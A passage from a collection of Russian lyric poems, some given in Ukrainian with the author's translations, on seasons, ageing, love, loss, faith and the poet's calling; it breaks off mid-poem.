Семь утра.
Ни свет, ни темь –
Сплошь туман белёсый.
С чашки кофе начат день,
С дыма папиросы.

Горький кофе,
Горький дым,
Горек воздух волглый…
Сладко как – для долгих дум
Не светает долго.


Под занавес



Что теперь, дружок, тужить.
Прожил жизнь не так, как надо.
Лишь под занавес – награда –
Понял, как не надо жить.

То, что поздно – не беда.
Важен факт, что всё же понял.
Чтоб, пока не помер, помнил.
Каялся. Хоть иногда…


Таится в снегах теплота



Февраль.
И мороз не спадает
Но вот – у нагого куста
Покров оседает и тает,
И это, видать, неспроста.

Видать, даже в стужу
Густая
Таится в снегах
Теплота.

Спасённые этим от тленья,
Ждут корни положенный срок,
Чтоб сока весенним кипеньем
В мир вытолкнуть
Каждый
Листок.


Боль и бой



* * *

Бой – боль.
Бой любой –
за любовь.
Любая любовь –
боль и бой


С натуры


* * *

После оттепели
короткой –
мороз.
Улица – лоск.
В лёд тротуара,
как лодка,
вмёрз
газетный киоск.


Из непечатавшегося

* * *

Тварь мелкая! Шакалий сброд!
А норовят куснуть, как волки,
Трусливо сбившись в хоровод,
Плешивые взъерошив холки.

Сужают беспощадно круг,
Слюной и злобой истекая.
На свору всю – один недуг:
Им зависть разум затмевает.

Готовы в клочья разорвать
Сквозь злое терние идущих,
Губя свои святые души,
Чтоб жировала пёсья рать.
...............................................

Вина доселе не снята
С потомков тех, кто не по праву
Распяли на кресте Христа,
Помиловав притом Варавву.


Боимся


* * *

Может статься, может статься…
Мы боимся в том признаться.
Мы боимся оступиться,
Упустить из рук синицу.

Сердце выдержит едва ли,
Коль поймёшь: что примножали,
Что старательно копили –
Равноценно горстке пыли.


Хотя узоры на стекле

* * *

Дышу зимой, а думаю о лете…
.......................Римма Казакова

Белым-бело на белом свете,
А я который день – о лете.
Про бисер рос, стрекоз балет,
Хотя узоры на стекле.
О кулике пишу, болоте,
Крапивниц трепетном полёте.
Про шёпот трав и шелест крон,
Про муравьиный Вавилон…
Пишу о летнем звонком зное,
А за стеною вьюга ноет.


В жёстких рамках ненастных дней



* * *

О любви пою и о счастье.
Хоть ненастья не избежать,
Верю в то, что любое ненастье
Мы любовью можем унять.

Небом нам даровано выжить
В жёстких рамках ненастных дней.
С каждым днём становимся ближе
И родней.


Январское


* * *

Заиндевевший лес прозрачен.
Он лишь стволами обозначен.
Он, словно облачко, плывёт –
На недалёком расстоянье.
Как будто выдохнул, и вот –
Застыло в воздухе дыханье.


Расскажи, как живётся тебе...


* * *

Вот он – наш необжитый уют –
Деревянный низенький дом.
Пусть повсюду метели метут,
Будет сухо и радостно в нём.

Что в дверях-то стоишь? Заходи.
Ты не гостья – хозяйка здесь.
На весь лес сегодня, поди,
Вороньё разнесло эту весть.

Вешай шубу, а я сейчас
Дров возьму и печь затоплю.
Нет, наверно, счастливее нас
Никого в этом белом краю.

Вот уже и ожил огонь.
Слышишь, как загудело в трубе?
Рядом сядь. Дай свою мне ладонь.
Расскажи, как живётся тебе.


Строфы X




*

Крест – дан,
И – хошь не хошь – неси.
А бросить – Боже упаси!


* *

Поэт – по сути – проводник.
Он сам стихи не пишет.
Он просто держит напрямик
Связь с разумом всевышним.


* * *

Пройдя сквозь немоты глушизны,
Как стебель тонкий сквозь гранит,
Мы радостно поём о жизни,
Хоть каждый ею гнут и бит.


Счастье мимолётно…


* * *

Счастье мимолётно.
Горе – дольше длится.
Закрываем окна,
Чтобы оградиться
От невзгод внезапных,
От погод ненастных.
Закрываем окна,
Только – всё напрасно…


На полях рукописи

На полях рукописи
лирики разных лет
Василя Дробота


С ума не сходят от стихов,
Но, видит Бог, не вру:
Готов до третьих петухов
Вдыхать словес игру.

Потоком мыслей поглощён,
Подхвачен вихрем чувств,
Я в Вашу веру обращён,–
Быть праведным учусь.


Оптимистический сонет


* * *

Ещё на что-нибудь сгожусь!
Представь себе, я верю в это.
Слова найдутся для куплета,
Петь не умея, спеть решусь.

Ещё на что-нибудь сгожусь.
Ну что с того, что срок недолог?
Того, что жизнь полна уловок,
Уже нисколько не страшусь.

Ещё на что-нибудь сгожусь.
В счёт не бери мои седины, –
Я юн и крепок с середины.

Чело печалить нет причины,
И утверждать я не стыжусь:
Ещё на что-нибудь сгожусь!


Враги мои – мои учителя



* * *

Враги мои – мои учителя.
Уроки все их злые подытожив,
Теперь я знаю, что же нужно для
Того, чтобы не быть
На них похожим.


Занимаюсь реставрацией...

* * *

Занимаюсь реставрацией –
Ворошу черновики.
Занимаюсь инкрустацией
Каждой буквы и строки.

Снова вглядываюсь пристально
В скоропись забытых фраз.
Самородки слов бугристые
В них шлифую, как алмаз.


По первопутку год уходит

* * *

Затишье после снегопада.
Слепит глаза декабрьский свет.
Душа преображенью рада –
Ни грусти, ни печали нет.

Покой и чистота в природе.
Царит гармония во всём.
По первопутку год уходит
В великолепии своём.




Бессонница



Три часа ночи. Четыре утра…
Час – и меняются в корне названья.
Вьюга шалит и шальные ветра
Мучают и теребят мирозданье.

Долго курю, горькой грустью томим,
Взгляд в непогоду и в темень вперяя.
Клён за окном, бессловесно, как мим,
С веток озябнувших снег отрясает.

Из лесу крики несёт вороньё,
Чёрной ордою стремится к рассвету…
Где же блуждаешь ты, счастье моё? –
Нету покоя и радости нету.


Не веду я с судьбою торга


* * *

Не веду я
с судьбою торга,
в путь иду,
куда б ни вела.
Лишь бы петлю мне
не вила,
лишь бы пулю мне
не лила,
умереть дала
от восторга.

Не веду я
с судьбою торга.


Лучшее что есть



* * *

Не надо, жизнь, голубушка, не надо
Коситься на меня печальным взглядом.
Не стоит хмурить брови, – нет причины,
Нет повода, поверь мне, для кручины.
Какая б ни была, до самой смерти
Ты – лучшее, что есть на этом свете.


Итожа год

* * *

Жизнь проходит...
Год итожа,
Я себя итожу тоже.
Говорю себе: – Серёжа,
Не хандри, браток, держись.
Нам с тобой, дружок, негоже
Сырость разводить на роже,
Пожили и знаем: всё же
Здоровская штука – жизнь!


Пора удачам счёт вести

    Вячеславу Егиазарову

* * *

Пора удачам счёт вести,
Забыть все прошлые невзгоды.
Невмоготу уже брести
С такою ношей через годы.

Пора удачам счёт вести.
Неужто мы того не стоим,
Чтобы сияние нести,
Как пару крыльев за спиною.


В белом логове зимы


* * *

    Делается волком человек,
    Волком воет да на всю округу…

    ....................Инна Лиснянская


В белом логове зимы
Серым волком затаюсь.
Рад бы радость взять взаймы,
Да судьба ссужает грусть.

Нет просвета впереди.
От обиды сам не свой,
Силюсь удержать в груди
Стон, что так похож на вой.

Что-то деется с людьми.
Нынче всяк другому враг.
Неужели для любви
Места нет у нас в сердцах?

В белом логове зимы
Сберегу остаток чувств.
Принимать по-волчьи мир
Никогда не научусь!


Вкус строк



* * *

У строк моих, я знаю, горький вкус,
И подсластить жизнь ими невозможно.
Они скорее сталь ствола к виску,
Чем к ссадине прижатый подорожник.


Ощущенье перемены


* * *

И видено, и знаемо, и всё же –
До замирания, до спазм и дрожи –
Волнует всё, чарует неизменно,
Даруя ощущенье перемены,
Движенья, воспаренья и полёта,
Границ не зная, отрицая квоты.


Строфы-IX



*

Из жизни сумрачной чащи
На крайний рубеж выхожу.
Оглядываюсь всё чаще,
Всё реже вперёд я гляжу.
Довольствуюсь настоящим,
Приемля и радость, и жуть…


* *

Давно пора бы с тем смириться,
Но горько и на склоне лет.
Ты в памяти, как в антраците –
Цветка окаменевший след.


* * *

Того, что было, нет давно в помине,
Так стоит ли по прошлому тужить?
По памяти рисуют лишь картины,
А жизнь нельзя по памяти прожить.


Повеяло зимой



* * *

Ночной снежок – налётом тонким –
Пушок в полпальца толщиной.
Припорошил лишь землю только,
А как повеяло зимой!


У порога



* * *

День завершается.
Грустно немного
с ним расставаться.
Стою у порога.
Мешкаю,
звякая долго ключами,
чтоб насладиться
заката лучами.


День рождения



Жизнь – мгновенье.
Вдох – и только.
Что там, в дымчатой дали?
Отломилась жизни долька
Так, что слёзы потекли.


Параллели

          Игорю Муханову

* * *

Мы разные,
И тем не менее –
Мне кажется порой:
В ином каком-то измерении,
В иной реальности, в ином эфире
Мы – параллельные прямые –
Пересекаемся с тобой.


На улице



Черны и озлоблены лица,
Заботою смяты черты…
И ты среди них – очевидцем
Людской беспросветной тщеты.

Ни лучше, ни хуже, и так же
Озлоблен и мрачен лицом,
Снуёшь среди суетных граждан,
Охвачен их нервным кольцом...

..............................

Нет-нет и по киснущей роже
Улыбочки тень пробежит:
Не всё так плачевно, похоже,
Коль рядышком жизнь шебаршит.


С годами…


* * *

Дни всё короче,
Ночи – длинней...
Стал с годами я зорче
И… грустней.
Навалилась усталость –
Не продохнуть.
Тихой сапой
Подкралась старость,
Давит лапой
На грудь…


Вот и первые морозы…


* * *

Вот и первые морозы –
Словно первая гроза.
Неожиданно, как слёзы
На счастливые глаза.
Неожиданно, как выстрел, –
Замер палец на курке.
Неожиданно, как мысли
На салфетке в уголке…


Синяя птица

СИНЯЯ ПТИЦА

Синяя птица, упоминаемая в одноимённой
сказке М. Метерлинка, вполне реальна.
Орнитологи относят её к семейству дроздовых.


______________________


Я-то думал –
……………...она из сказки.
А она…
……….Она существует!
И совсем
…………не такой окраски,
Как фантазия наша
……………………рисует.
Обитает
………..у горных речек,
В недоступных
…………..…каньонах Тянь-Шаня…
О, наивный мой
…………………человечек,
Мы с тобою,
……………..об этом не зная,
В детстве зря только
…………………….время теряли,
По посадкам шныряя
………………………и паркам.
По окраске её искали,
Ну а надо было –
…………………..по картам.
Мы не знали.
……………..Мы верили
………………………….в сказку.
В этот цвет –
……………..как мечта
……………………….и как небо.
Если б знали –
………………..мамину ласку
Променяли б
……………..на радость побега.
Мы б сбежали
………………в горы Тянь-Шаня,
К недоступным
………………...его каньонам…
Зря твердит
……………орнитолог Таня,
Что относят её
……………….к дроздовым.
Зря твердит –
………………всё равно
…………………………не верю!
Я найду её след,
…………………а по следу –
Сказку детства,
………………..свою потерю.
На Тянь-Шань
……………….всё равно
…………………………..поеду!

1982


Во мне затишье, словно перед бурей…



* * *

Во мне затишье, словно перед бурей.
Ни дуновения, ни ветерка…
Мыслишки, что обычно плещут бурно,
Не шелохнутся, не стучат в висках.

Внезапной тишиною оглушённый,
Попавший в ход томительных минут,
Лишь одного желаешь неуклонно –
Чтоб вновь они в тебе подняли бунт.


Жизнь скучать не даёт

Это – только привал,
Небольшой перекур.
Час ещё не приспел
Прозябать по завалинкам.
Жизнь скучать не даёт.
Чтоб не впали в тоску,
То кнутом стеганёт,
То полакомит пряником…


Не берусь ни гадать, ни пророчить…



* * *

Не берусь ни гадать, ни пророчить
Сколько вёсен ещё впереди.
Знаю – осень свою не отсрочить,
Срок зиме подойдёт – остудить.

К сожалению, век наш не вечен.
Тем дороже и радостней тем
Каждый день, что судьбою намечен
До ухода в кромешную темь.


Меня не исправить



* * *


    Может, жизнь моя и была смешна,
    но кому-нибудь и она нужна.

    ..................................Б. Окуджава



Меня не исправить: душою – поэт.
Пытались – и что? – напрасно старались.
Теперь, по прошествии множества лет,
Вы видите сами: с носом остались.

Не стоило, право, в те давние дни
Ломать было копья, каверзы делать.
Поэты – они иноходцам сродни.
Несутся стремглав, не зная предела…


Строфы-VIII



*

Чем дальше, тем страшнее мне.
Ни буковкой не лгу, поверьте.
Ведь в каждом наступившем дне
Всё яростней дыханье смерти.


* *

Исчезнуть «светит» нам в итоге,
А вот стихам – остаться тут.
Даст бог, на чьём-нибудь пороге
Найдут когда-нибудь приют.

* * *

Пишу под диктовку отчаянья.
«Отчаянье» – точное слово.
Стихи – непременно – от чаянья.
От веры.
Она – их основа.


Как бы ни было, живу…



Сочинилось на прогулке,
В тишине октябрьской гулкой.



* * *

Как бы ни было, живу.
А точнее – доживаю.
Вот – пожухлую траву
Шагом медленным сминаю.

Вот – озябшею рукой
Долго шарю сигарету.
Тишина вокруг, покой,
Лишь в душе покоя нету.

Вдаль рассеянно гляжу.
Прели запахи вдыхаю.
Приближаюсь к рубежу.
Не живу, а доживаю…


Октябрьские строфы


* * *

Стынет дождь в пустых следах.
Треплет ветер космы сосен.
Листьев медь сгребает осень
В тёмный, как сундук, овраг.


* * *

На ветру, на осеннем таком,
Холодком весь пронизан, как током,
Ощущаю себя я листком,
Что дубок обронил ненароком.


* * *

Стрекоза
уселась на запястье –
чуточку согреться…

Господи!
Какое счастье –
обогреть в часы ненастья
страждущее
сердце.


Осенняя синяя свежесть...

* * *

Осенняя синяя свежесть.
Красные клёны вдали.
Последняя кроткая нежность
Всё ещё тёплой земли.

Покой на равнине покатой
И в сердце моём покой.
От горькой полыни и мяты –
Мятой и сладкой такой!


Всё ещё ликует синева



* * *

Снова по-весеннему тепло,
Мир наполнен радостью и светом.
Кажется, что лето не ушло,
А лишь только притаилось где-то.

Всё ещё ликует синева,
Прель хмельная голову дурманит.
Наплевать, что полегла трава
И что скоро заморозок грянет.

Я брожу один в лесном краю,
Поредевшем и омытом светом.
Тешит душу грешную мою
В паутинках белых бабье лето.


Муки душевные тяжче телесных…



* * *

Муки душевные тяжче телесных.
Господи, в чём я повинен, скажи,
В том ли, что были мне узки и тесны
Рамки различные и рубежи?

В том ли, что метры квадратные быта
Запросто мог променять на простор;
Душу питая стихами досыта,
От недосыпа ложился пластом?

В том ли, что был устремлён в неизвестность?
В том ли, что верил всегда в миражи?..
Муки душевные тяжче телесных,
Но, если честно, без них не прожить.


Разве это не чудо…


* * *

Хіба ж це не диво,
коли зусюди
дивляться на тебе
з-під опалої глиці
заслиненими дітлахами
маслюки,
радіючи
зустрічі.

Авторский перевод:

Разве это не чудо,
когда отовсюду
смотрят на тебя
из-под опавшей хвои
слюнявой детворой
маслята,
радуясь
встрече.


Ещё жируют утки на пруду...

* * *

Ещё жируют утки на пруду,
Хотя октябрь и заморозки утром.
Когда – в отлёт, коль холода придут, –
Кому знать лучше, ежели не уткам.

Законы жизни им куда ясней,
Чем нам, создавшим умные машины.
Тому, что юг до этих стылых дней
Их не прельщает, – есть, видать, причины.


Кому нужна моя печаль



* * *

Кому нужна моя печаль?
Она со мною в час закатный
Уйдёт, и вам не будет жаль
Её, ушедшую внезапно.

Осенним просветлённым днём
Остаток радости в наследство
Оставлю тем, в кого влюблён,
Тем, с кем грустилось по соседству.

Кому нужна моя печаль?!


Есть радость с грустными глазами…



* * *

Есть радость с грустными глазами,
Есть горе с радостным лицом.
И зря, того не зная сами,
Мы называем смерть «венцом».

Живём на ощупь, как слепые,
А думаем, что зорче нет.
Как часто чудеса земные
Страшней пришедшего во сне.

Возможно, этот свет не этот,
А всё совсем наоборот…
Непросто – просто быть поэтом.
Кто не был им, меня поймёт.


Сентябрьское сентиментальное


………...Не жалей ни о чём,
………...Ни о чём не жалей.
Под сентябрьскою сенью седых тополей,
По сырому асфальту пустынных аллей
………...Я брожу и твержу:
………...Ни о чём не жалей.

………...Не жалей ни о чём,
………...Ни о чём не жалей.
Вот и первые листья летят с тополей.
Повальсировав чуть, устилают дорогу…
………...Не жалей ни о чём,
………...Не жалей, ради бога.


Большего душе не надо



* * *

Нынче осень больно хороша.
Большего больной душе не надо,
Только б слушать, слушать не дыша
Шепелявый шёпот листопада.


Кружился в танце мотылёк…



* * *

Кружился в танце мотылёк.
В прыжке прервал его круженье.
Кулак разжал, а то – листок
Осенний…


Осень бьёт в колокола


* * *

Чу! Осень бьёт в колокола –
Плывут малиновые звоны.
Как золотые купола,
Горят на солнце клёнов кроны.

Светлы и сини небеса.
Туман ещё не застит дали.
Не наступила полоса
Несносной грусти и печали.

Не осень будто, а весна.
Ничто души не омрачает.
Как и положено, она
Сиянье щедро источает.


Осень – это…


* * *

Осінь – це зіштовхнутися
з шкільним приятелем
і залишитися невпізнаним.


Авторский перевод:


* * *

Осень – это столкнуться
со школьным другом
и остаться неузнанным.


И снова начинаются стихи…



* * *

И снова начинаются стихи.
Сквозь заскорузлую души скорлупку
Проклевываются птенчики строки –
Старательно и неотступно.

Ломается, трещит каркас.
Сквозь наслоенья горечи и боли
Слова добра и нежности запас
Потоком света просятся на волю.


Нахлынуло и понесло…


* * *

Настало.
Сдвинулось.
И вот –
Себя я не пойму –
Аккорд,
…...….аккорд,
…………..….аккорд,
…………..…………аккорд –
Волною на волну!

Нахлынуло и понесло.
Кипит внутри и вне.
Перо моё – моё весло –
Скрывается в волне…


Заросли души газоны


* * *

Не пишу стихов – нет времени.
Есть дела и поважней.
Из пегасового стремени
Выбит суматохой дней.

Словно витязь на распутье,
Дёрнув не за ту вожжу,
Не на тот направил путь я
Свои стопы. И живу

Не по тем теперь законам,
По которым надо бы…
Заросли души газоны
Ядовитой ягодой.


Теплю надежду



* * *

Возможно, наивно,
Но теплю надежду,
Что Бог не позволит
Сомкнуть веки прежде,
Чем час тот настанет,
Когда не смогу
И слова простого
Я выронить с губ.


Завтра будет непременно лучше…



* * *

Завтра будет непременно лучше.
Быть не может, чтоб иначе было.
На рассвете нас разбудит лучик,
Просочившись между штор игриво.

Мы забудем все свои тревоги
И на грусть-печаль махнём рукою.
Звонко лягут под ноги дороги,
Дали распахнутся нам с тобою.

Мы в дела уйдём с большой охотой,
Мы постигнем новые пределы.
Не страшны нам временные квоты,
До всего у нас есть в жизни дело!

Завтра будет лучше, но сегодня
Нам никак нельзя терять азарта.
Предстоит ещё построить сходни
В это замечательное завтра.


Счастья не познать без боя...


* * *

Счастья не познать без боя?
Жизни смысл в борьбе?
А по мне – всё на любови
Зиждется в судьбе.

Если порознь, слабы все мы.
Но в беде любой
Выстоим, держась за стены
Доброты людской.


Одиночество в дом мой вселилось…



* * *

Всё не так, как хотелось, сложилось.
Мне мечталось совсем о другом.
Одиночество в дом мой вселилось,
Грусть-тоскою наполнился дом.

По ночам горьких слёз я не прячу,
Поутру утешаюсь: «Пустяк!»
Ведь сложись хоть немного иначе,
Никогда б не любил тебя так.


Ничего не обещаю…



* * *

Ничего не обещаю –
Поздно что-то обещать.
Как клинком – по рукоять,
Сердце пронзено печалью.

Душит душу пустота.
Словно в брошенной квартире,
Под покровом серой пыли
Умирает доброта.

И лишь где-то там, в углу,
В липкой плотной паутине,
Пёстрой бабочкой поныне
Бьётся трепетно «люблю».


В чёрном небе ясный месяц…



* * *

В чёрном небе ясный месяц.
Тишь по свету разлита…
Сколько можно куролесить,
Да в такие-то лета!

Не пора ль остепениться.
«Хватит!» – сам себе твержу.
Не ровён час, оступиться
Можно, ухнуть за межу.

«Побуянили – и будет!» –
Душу грешную струню.
…Светит месяц. Росы студят
Непокорную стерню.


Никуда не деться...



* * *

Пишу, пишу –
и никуда не деться.
Хочу иль не хочу,
через кристаллик сердца
перетекает всё,
просеивается, чтобы
остаться на листе
словами высшей пробы.


Что тут поделаешь, когда…



* * *

Что тут поделаешь, когда
Такая быстрая вода,
Такое сильное теченье,
Что сносит даже отраженье.
Но есть надежда – там, где устье,
Оно зацепится за кустик,
И перед тем, как канет в Лете,
Его наверняка заметят.


Не казни меня, память



* * *

З усіх
чотирьох сторін
вона наступає.
Відступати
нема куди –
здаюся в полон.
Благаю:
– Не катуй мене,
Пам’ять.



Авторский перевод:

* * *

Со всех сторон
она наступает.
Отступать некуда –
сдаюсь в плен.
Молю:
– Не казни меня,
Память.


Открою окно – и впущу холодок…

* * *

Открою окно – и впущу холодок,
Шелест листвы, что на ветках продрог,
Шорох травы, что туманом примят,
Чьи-то шаги, что так долго гремят.
Чёрных небес полынный настой,
Окон полночных блеск слюдяной.
Усталость и тяжесть прошедшего дня –
Часок скоротать за чайком у меня.


Сама история…


* * *

Сама история Петра благословила
Снимать колокола, чтоб пушки лить.
А вас какая вдохновила сила
Набатный колокол России
Бубенчиком плаксивым заменить?

Кто дал вам право суд вершить неправый,
Распоряжаться в чьей-либо судьбе?
Провозглашать – налево и направо –
Что, дескать, испокон веков держава
Держала сор в своей избе?

Кто вам позволил затыкать нам глотки?
И распинать воскресшего Христа?
И за больничные надёжные решётки,
Чтоб превратить там в крохотных и кротких,
Упрятать тех, кто ложь терпеть устал?

Кто понукал, чтоб в петли лезли сами
И сами пули себе всаживали в лбы?
Кто отпевал нас сладкими словами,
Умело пряча радость за слезами,
Кто первым землю сыпал на гробы?

Настало время всех призвать к ответу.
Теперь под маскою не утаить лица.
Пора воздать поэтово поэту
И всё – до йоты! – вспомнить подлецам.

1988


Забыл, когда я удивлялся...

* * *

Забыл, когда я удивлялся,
И каждый день, и каждый день
Мне одинаковым казался,
Даря муру и дребедень.

Тянулся долго и несносно.
Ткал серые свои силки.
И я, как в пресловутых соснах,
Блуждал, зажат в тиски тоски.

Не знаю, сколько б это длилось,
Но, слава Богу,– ты явилась!


Дивлюсь и радуюсь всему




Как будто в позабытом чуде,
Всему беспомощно дивлюсь…

............................М. Дудин


Дивлюсь и радуюсь всему,
Как будто заново родился,
Как будто взору моему
Теперь лишь только мир открылся.

Как будто бы судьба моя
Меня не мучила, не гнула,
Как другу, к тайне бытия
Заветный ключик протянула.


Боль



* * *

Заноза – что?
Занозу вынул –
И ранка тут же зажила.
А эта боль
Неизлечима –
Всю душу мне
Насквозь прожгла.


Уезжал, чтоб все печали…


* * *

Все дороги рождают печали…
........................Юрий Кузнецов


Уезжал, чтоб все печали
Позабыть в пути,
В поездах с дешёвым чаем
Дух перевести.

Но внезапная тревога
Заслонила даль.
Родила моя дорога
Новую печаль.


Потому что люблю


* * *

Я соскучился – до «не могу».
Позови только – и побегу
Босиком по снегу в пургу,
Назло лютому февралю.
Потому что люблю.

Если море – плот смастерю.
Если горы – туннель пробурю.
Не смогу – развалю!
Пропасть – глыбами завалю.
Вечный лёд – растоплю.
Потому что люблю.

Я плевал на беду!
Будь хоть ад – и в аду
Я дорогу найду.
Я дойду. Добреду.
Возле ног упаду
И в бреду
Прохриплю:
«Я люблю…»

1987

_____________________
Довольно старая вещица,
Но захотелось поделиться...


Как бы ни было горько…


* * *

Как бы ни было горько,
В наших тетрадках
Много больше стихов
О мгновениях сладких,
Что, пусть редко, но всё же
Случались подчас
В наше смутное время
В смутных судьбах у нас.


Замысел




ЗАМЫСЕЛ

Есть замысел и больше – ничего.
Не то, чтобы строки, а даже слова.
Начального, случайного, того,
Что непременно красочно и ново.
Нет ничего и всё – сплошной обман.
Ты куришь и не можешь накуриться.
Засунув руку нервную в карман,
Шагаешь по скрипучим половицам.
Всё шепчешь что-то, шевеля едва
Сухими, напряжёнными губами,
Но не находишь нужные слова
И, обрамлённый сизыми клубами,
Устало наклоняешься к столу,
Сутулишься, вздыхаешь, рвёшь бумагу...
Вдруг вздрагиваешь: может, на полу,
Подобное низвергнутому флагу,
То слово, что искал давным-давно
Среди других – причудливых и странных,
Ничем не привлекательно, скромнo,
Лежит, раздробленное в клочьях рваных…


Друзья простят, что пропадаю…


* * *

Друзья простят, что пропадаю,
Из всех компаний выбываю,
Встреч не ищу, не назначаю,
На их звонки не отвечаю.
Друзья простят. Они-то знают:
Всегда со мною так бывает,
Когда стихи одолевают.


Всё заново


* * *

Опять ломаю то, что строил,
На чём все руки измозолил,
Над чем корпел я по ночам,
О чём мечтал, о чём кричал.

Ломаю то, что так берёг
От кулаков и от сапог,
От чёрных глаз, злых языков,
От – пеной брызжущих – клыков.

Ломаю то, чем был так горд,
На чём нажил смешной свой горб.
Чем дорожил, чем жил – ломаю.
И заново всё начинаю!


Птица

* * *

Не могла
Привыкнуть к рукам –
Тосковала по облакам.

Ни воды не просила,
Ни хлеба,
Только – неба.

Когда выпустил,
Понял я:
Не синицу держал – журавля.


Слава богу, что...

* * *

Слава богу, что печали
Не лишили света дали.

Слава богу, что тоска
Не сгустила облака.

Слава богу, что невзгоды
Не испортили погоды.

Пусть и впредь мои напасти
Никому не застят счастье.


Жизнь не стоит проклинать…



* * *

Жизнь не стоит проклинать,
Всё же – божья благодать.
От рождения до смерти
Жизнь чудес полна, поверьте.

Есть, конечно, и тревоги,
Как без них в пути-дороге?
Можно ли куда дойти
Без препоны на пути?


Гореванье твоё и моё горевание…


* * *

Гореванье твоё и моё горевание –
Это лучшее, что можно ждать от небес.
Жизнь, не знаю за что, нам дана в наказание,
И нести до креста нам с тобой этот крест.

А в награду за всё – на последней минуте,
Когда смерть не являет ни ужас, ни страх,
Ощутим, как, должно быть, счастливые люди,
Сладкий привкус на горьких от крови губах.


Просеивая прошлого песок…


* * *

Просеивая прошлого песок
сквозь сито памяти,
пытаюсь устоять я
в сегодняшнем,
платя за жизнь оброк
крупицами
…………..теряемого
……………..………счастья.


В чащобе надгробий


    Memento mori


* * *

Было пастбище.
После – стрельбище.
Нынче – кладбище.


* * *

Вырубили лес –
под погост.
В стремительно выросшей
чащобе надгробий
до сих пор звучит
чьё-то «ау».


* * *

Разъятая на могилы,
неохотно принимает Земля
семена смерти –
деревянные скорлупки
с ядрами остывших тел.
Знает наверняка:
не продлит жизнь
мёртвое семя.


ЭПИТАФИИ

*
Жизнь ценна тем, что бренна.

*
А смерть приходит, как всегда, некстати…

*
Прекрасно лишь то, что прошло.


* * *

Только смерть
способна измерить
глубину следа,
оставленного тобой
в жизни.


В степи


СТЕПЬ. ПОЛДЕНЬ

Где север здесь, юг, запад, восток?
Едкая пыль да белый песок.
Сплошной горизонт, куда око не кинь.
Горько и терпко пахнет полынь.
Солнце в зените выжгло дыру.
Шуршит, как бумага, ковыль на ветру.
Суслик пугливый бежит из-под ног.
Вязнет в горячем тяжёлый сапог…
Путник в степи – неуклюж и нелеп –
Жаждой измучен так же, как степь.


Кто выше



* * *

Поки
хмарочоси
міряються,
хто вищий,
сільські церкви
спілкуються
з Богом.



Авторский перевод:

* * *

Пока небоскрёбы
спорят, кто выше,
сельские церкви
общаются
с Богом.


Что-то мучит, а что – не пойму…

* * *

Что-то мучит, а что – не пойму.
Я, по жизни такой нелогичный,
Лишь прислушиваюсь к тому,
Что роится в душе хаотично.

Мне неведом холодный расчёт,
Весь на чувствах и на порывах…
Может, Боженька это зачтёт,
Если вдруг я сорвусь с обрыва.


Сбрею бороду, – без бороды…


* * *

Сбрею бороду, – без бороды
Я, конечно же, стану моложе.
Как мне хочется, что бы ты,
Так как прежде, сказала: Серёжа.

Чтоб ладонью коснулась щеки,
Омоложенной острою бритвой…
Только мы теперь так далеки, –
Не дотянешься даже молитвой.


Смотрю ещё с надеждой в небеса…



* * *

Смотрю ещё с надеждой в небеса,
Хоть высотой, как в юности, не грежу.
Ещё чаруют душу чудеса,
Да только – замечаю их всё реже.

Сверяю с сердцем стихотворный ритм,
С теченьем времени – души движенье.
Час неровён, на рифе старых рифм
Не избежишь позорного крушенья...


Строфы-VI



*

А жизнь проста, как оказалось.
У всех нас путь один:
Алкая счастия и маясь –
От соски до седин.


* *

Мгновенно счастье, если и случится.
Всевышний мудр и, вместе с тем, жесток:
Даёт возможность отыскать исток,
Но вдоволь не даёт им насладиться.


* * *

Нет, жизнь – не подарок, скорее – обуза.
Но нет драгоценней и радостней груза.
Подчас проклинаем, всем недовольны,
А – время расстаться – горько и больно.


Этим мне не поступиться


* * *

             Алексею Борычёву


За жизнь не одну одолел я межу,
Но этим мне не поступиться:
Когда затоскую, я в лес ухожу –
Берёзам и елям открыться.

Меня, как родного, встречают они,
Любовь свою в кронах лелея.
И, сбросив томительный груз в их тени,
На мир я смотрю веселее.


Осмысливая путь


* * *

Наш срок земной предельно краток.
И ты, осмысливая путь,
Вдруг понимаешь – мал остаток,
А прожитого не вернуть.

То- не успел, не сделал это
И вновь – в работу с головой.
Чтоб к цели подойти заветной,
Не прекращаешь бой с судьбой.

С самим собою спор ведёшь,
В предназначение вникая.
Вся жизнь, что набело живёшь,
Завалена черновиками.


Когда жизнь нелегка…

* * *

Завидую водам,
Веками
Упорно шлифующим камни.

Завидую водам,
На деле
Всегда достигающим цели.

Но в час,
Когда жизнь не легка мне,
Завидую стойкости камня.


Что нам печали!



* * *

Что нам печали, когда за плечами
…..…….Столько всего.
Пусть же отчаянье лодкой отчалит
….……….От твоего
Берега млечного – в даль бесконечную,
……….Пусть же всегда
Радостью полнится дом и околица.
…………..Ну а когда
С облака сеется дождик рассеянно,
…………То – не беда.


Пробежал ветерок над водою...

* * *

Пробежал ветерок над водою,
Прошуршал камышами и стих.
Веет свежей прохладой ночною
И настоем трав луговых.

В лунном свете осока светится,
Листья острые режут тьму.
И невольно во что-то верится,
А во что – и сам не пойму.

Прокричит за рекою птица
Или рыба плеснёт в реке,
И такое в душе творится,
Словно счастье невдалеке.


Строфы-V

*

Молоды были мы,
Были наивны,
Мудрость не видели
В слов простоте:
Счастье не в том,
Что достигнешь вершины, –
В том,
……..что упорно
……..…………..идёшь
…………..........………к высоте.


* *

Вот и камни собирать пришёл черёд.
Те, что сам я разбросал когда-то.
Чтобы в мой их не метали огород,
Предварив бросок ядрёным матом.


* * *

Хочется радостно жить – не выходит.
Слишком уж много печальных мелодий.
Слишком уж мало на сказку похоже
То, что Ты создал, прости меня, Боже…


Случай

* * *

В тихом скверике у мОста,
Как-то с другом водку пили.
Говорили, как непросто,
Как тревожно нынче в мире.
Мы взмывали в эмпиреи,
Будто впрямь имели крылья.
Между нами Рильке реял –
Над рекой, что молча рыла
Рылом волн песчаный берег,
Всю поэзию похерив…


Наложу на чтенье вето…



* * *

Наложу на чтенье вето,
На писанье – жирный крест,
И – на дачу на всё лето –
Столько чудных мест окрест!

Муза подмигнёт игриво
И промолвит с холодком:
– Отдыхай, поэт. Счастливо!
Не зови меня потом…

С чтения запрет снимаю.
Лист бумаги нахожу.
Никуда не уезжаю!
Никуда не ухожу!


Летняя ночь


* * *

Ночь летняя светла,
………….и в ней приметны звуки:
Так явен роста звон,
………….что не уснуть в саду.
И травы, и цветы
………….ввысь простирают руки,
На цыпочки встают –
………….достать свою звезду!


Засыпаю – к костру спиной…


* * *

Засыпаю – к костру спиной,
Лицом – в темень ночную и сырость.
Зябко ветка дрожит надо мной –
За неё звезда зацепилась!

Восходя невесомо в зенит,
Чуть задела лучиком ветку,
